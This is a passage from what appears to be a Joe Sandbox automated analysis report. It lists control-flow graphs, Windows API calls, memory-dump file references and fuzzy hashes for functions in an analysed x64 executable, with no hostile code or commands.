                                                                                  • Instruction Fuzzy Hash: F1611562A1874185F7209B69E41076EA7B1FF987A8F540335CEA903AD4DF3DC45AC710

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                  • String ID: ]
                                                                                  • API String ID: 3561356813-3352871620
                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction ID: 6743b69776621ff9da0bd5a75ed6eebd4c6d3fee3830fa24a30a7a3d28432539
                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction Fuzzy Hash: 9911B920F0D64241FA64BB619665B79D791BF88BC0F8C40B4ED1D07B95EE2DE8068750

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1266772231-0
                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction ID: 1f557e060d80ba1c86c9d18564f422ef878f625dfb98a45ae0060f081fe88360
                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction Fuzzy Hash: 79F04F35B3855282FB50AB24E8A5E36A361FFE4B04FC85071E54E41954DF3DD509DB50

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction ID: f9beeb531bf3c0b642ee51563a56a46b7648810c99b763e4460602ea898d2acb
                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction Fuzzy Hash: 15013161B18A4381FA64AB61F820BB6A390BFA8744FCC11B1D94D4A755EE2CE14AD660

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 3893 7ff75aab2ce0-7ff75aab2d0a 3894 7ff75aab2d13-7ff75aab2d1b 3893->3894 3895 7ff75aab2d0c-7ff75aab2d0e 3893->3895 3897 7ff75aab2d1d-7ff75aab2d28 GetStdHandle 3894->3897 3898 7ff75aab2d2b 3894->3898 3896 7ff75aab2ea9-7ff75aab2ec4 call 7ff75aad2320 3895->3896 3897->3898 3900 7ff75aab2d31-7ff75aab2d3d 3898->3900 3902 7ff75aab2d3f-7ff75aab2d44 3900->3902 3903 7ff75aab2d86-7ff75aab2da2 WriteFile 3900->3903 3904 7ff75aab2daf-7ff75aab2db3 3902->3904 3905 7ff75aab2d46-7ff75aab2d7a WriteFile 3902->3905 3906 7ff75aab2da6-7ff75aab2da9 3903->3906 3908 7ff75aab2ea2-7ff75aab2ea6 3904->3908 3909 7ff75aab2db9-7ff75aab2dbd 3904->3909 3905->3906 3907 7ff75aab2d7c-7ff75aab2d82 3905->3907 3906->3904 3906->3908 3907->3905 3910 7ff75aab2d84 3907->3910 3908->3896 3909->3908 3911 7ff75aab2dc3-7ff75aab2dd8 call 7ff75aaab4f8 3909->3911 3910->3906 3914 7ff75aab2dda-7ff75aab2de1 3911->3914 3915 7ff75aab2e1e-7ff75aab2e6d call 7ff75aad797c call 7ff75aaa129c call 7ff75aaabca8 3911->3915 3914->3900 3916 7ff75aab2de7-7ff75aab2de9 3914->3916 3915->3908 3926 7ff75aab2e6f-7ff75aab2e86 3915->3926 3916->3900 3918 7ff75aab2def-7ff75aab2e19 3916->3918 3918->3900 3927 7ff75aab2e88-7ff75aab2e9b 3926->3927 3928 7ff75aab2e9d call 7ff75aad220c 3926->3928 3927->3928 3929 7ff75aab2ec5-7ff75aab2ecb call 7ff75aad7904 3927->3929 3928->3908
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                                  • Instruction ID: b10b85cf9f7301c122b68237fcb41832138df7c5aa19f838030b430d591a2b28
                                                                                  • Opcode Fuzzy Hash: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                                  • Instruction Fuzzy Hash: ED510B22B1974652FB50EBA5D444B7AA750FF55790F880177EA4D07AD4EF3CD88AC320

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2912839123-0
                                                                                  • Opcode ID: 026bc20b37c79a3b9cd77c26472f0129fcb044d8b857d7992271820a149e5442
                                                                                  • Instruction ID: 67ab0f4c8ac9e370f918c32b84cfcd759dc28407cb7239d9f515f173f67a358f
                                                                                  • Opcode Fuzzy Hash: 026bc20b37c79a3b9cd77c26472f0129fcb044d8b857d7992271820a149e5442
                                                                                  • Instruction Fuzzy Hash: 3851CF62F1465284FB00ABE4D844AADA322AF44B94FC84679DE5D17BD9DF6CD442C360
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                  • String ID:
                                                                                  • API String ID: 1452418845-0
                                                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction ID: 1e94f17c9b440d303e98a3e595fd22ebfeb599e691af53bb4c086446517ff52c
                                                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction Fuzzy Hash: 24313D21E0C64341FAD4BBE49411BB9E691AF44744FCC14B8E98E4B6D7EF2CA90BC270

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2359106489-0
                                                                                  • Opcode ID: 5f5a2498c506899800acde8abea11f876c241ca53163134c058b9fa48508e244
                                                                                  • Instruction ID: 426f73ad1f19a8c7331aa325f75e943d7af1f8583d9de71e3ea43062048c9dec
                                                                                  • Opcode Fuzzy Hash: 5f5a2498c506899800acde8abea11f876c241ca53163134c058b9fa48508e244
                                                                                  • Instruction Fuzzy Hash: A831D622A1C78681FA60EBA59454A79E351FF88790FD80271EE9D43AD5DF3CD8878230
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                  • Instruction ID: 7f00f4e9477bfade177a4e86eaabfa92fcb1f7636e38222517351779b68c097c
                                                                                  • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                  • Instruction Fuzzy Hash: 6E21F521A0C74681FA60AF91A400A3DE360FF85B94F9C44B2DA4D466C4EF7CDC8A8721
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AABECD8: ResetEvent.KERNEL32 ref: 00007FF75AABECF1
                                                                                    • Part of subcall function 00007FF75AABECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF75AABED07
                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF75AABE974
                                                                                  • CloseHandle.KERNELBASE ref: 00007FF75AABE993
                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF75AABE9AA
                                                                                  • CloseHandle.KERNEL32 ref: 00007FF75AABE9B7
                                                                                    • Part of subcall function 00007FF75AABEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AABE95F,?,?,?,00007FF75AAB463A,?,?,?), ref: 00007FF75AABEA63
                                                                                    • Part of subcall function 00007FF75AABEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AABE95F,?,?,?,00007FF75AAB463A,?,?,?), ref: 00007FF75AABEA6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 502429940-0
                                                                                  • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                  • Instruction ID: b7a5a3cc5ce51878d4aac2bc2d9b8b23ea59fcb4a2d8ad496468566a648abb35
                                                                                  • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                  • Instruction Fuzzy Hash: F6018032A14A8192F258EB61E544A6DF730FF88BC0F444074DB5D13225CF39E4B6C750
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreatePriority
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2610526550-3849766595
                                                                                  • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                  • Instruction ID: 5e24b6a7781c512b1c6cee40896411458c0dac67618be8eed8f9146da7cc83eb
                                                                                  • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                  • Instruction Fuzzy Hash: C2116031A08B4281F714FB54E8419A9F360FF94784F9C81B5D64E02669EF7CE982C7A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                  • String ID: riched20.dll
                                                                                  • API String ID: 174490985-3360196438
                                                                                  • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                  • Instruction ID: 8fbc01388647b39fa6556871b07a59290096efaecfbd0583a3b37d847af15b04
                                                                                  • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                  • Instruction Fuzzy Hash: 90F0AF71618A8182FB40AF60F40496AF7A0FF88314F880135E98D42754DF7CD18DCB20
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75AAC853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF75AAC856C
                                                                                    • Part of subcall function 00007FF75AABAAE0: LoadStringW.USER32 ref: 00007FF75AABAB67
                                                                                    • Part of subcall function 00007FF75AABAAE0: LoadStringW.USER32 ref: 00007FF75AABAB80
                                                                                    • Part of subcall function 00007FF75AAA1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAA1FFB
                                                                                    • Part of subcall function 00007FF75AAA129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75AAA1396
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAD01BB
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF75AAD01C1
                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF75AAD01F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                  • String ID:
                                                                                  • API String ID: 3106221260-0
                                                                                  • Opcode ID: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                                  • Instruction ID: 6e2dcd6106388b6688abeabcd75cf41f363a4685effd92b898bedb11dc22ab16
                                                                                  • Opcode Fuzzy Hash: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                                  • Instruction Fuzzy Hash: 0551C362F047425AFB00BBE1D4556FDA362AF85784FC8017AEA4D177DAEE2CD502C3A0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2371198981-0
                                                                                  • Opcode ID: 1efb8e3964760df1e8e504c58090104d82ec3478f89626f60cfdbe921361c3b8
                                                                                  • Instruction ID: 1ca2d9609d2839b01890f8ec81f1ddc9587e6bcce19dd61aad44573963fea6dd
                                                                                  • Opcode Fuzzy Hash: 1efb8e3964760df1e8e504c58090104d82ec3478f89626f60cfdbe921361c3b8
                                                                                  • Instruction Fuzzy Hash: A341E161B08645A5FA04AB92E544A79E395EF08BE0FD88231DE7C07BD5EF3CE096C354
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2272807158-0
                                                                                  • Opcode ID: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                                  • Instruction ID: c3114231b5a9e43add289a68ced13609d33b692221acb5cad43243c2abc65d44
                                                                                  • Opcode Fuzzy Hash: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                                  • Instruction Fuzzy Hash: 89411672A0878582FB109B54E444A69A3A0FF847B4F840335DFAD03AE5DF3CD896C710
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2176759853-0
                                                                                  • Opcode ID: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
                                                                                  • Instruction ID: 63acafa603980d39cf418b8a98ab39a58767ee503b08c49c09c1e82409cd0da3
                                                                                  • Opcode Fuzzy Hash: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
